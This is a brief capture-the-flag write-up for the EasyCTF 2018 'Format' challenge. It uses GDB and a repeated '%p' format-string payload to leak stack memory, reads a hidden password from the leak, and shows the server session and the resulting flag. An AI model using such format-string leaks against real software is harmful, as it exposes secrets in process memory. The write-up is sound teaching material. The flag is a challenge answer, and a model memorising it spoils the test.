EASYCTF - Format

21 Feb 2018

With GDB, we put a breakpoint when the program compare the secret with our input.

0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]

We display the content of the stack with the format string:

Input in GDB :

r < /tmp/f `python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f

Output :

0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f249000000000x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c8880x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x4007800x7ffce149c880(nil)(nil)

We look at the content of secret which is at $rbp-0x54 :

x/ga $rbp-0x54 0x702570251013f249

The program compare with eax. So we need to look at the 32 lowest bits of RAX.
So the secret is : 1013f249
We look for the secret in the leak from the format string. The content of secret is on 7th pointer.

We do the same on the server

user44798@shell:/problems/format$ ./format 
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000

Enter your secret password (in hex)
732581c9
easyctf{p3sky_f0rm4t_s7uff}

CTF Shell Club

EASYCTF - Format

Related Posts

ECSC 2019 - leHack - harmless 06 Jul 2019

ECSC 2019 - qrcode 13 May 2019

ECSC 2019 - The Pytector 13 May 2019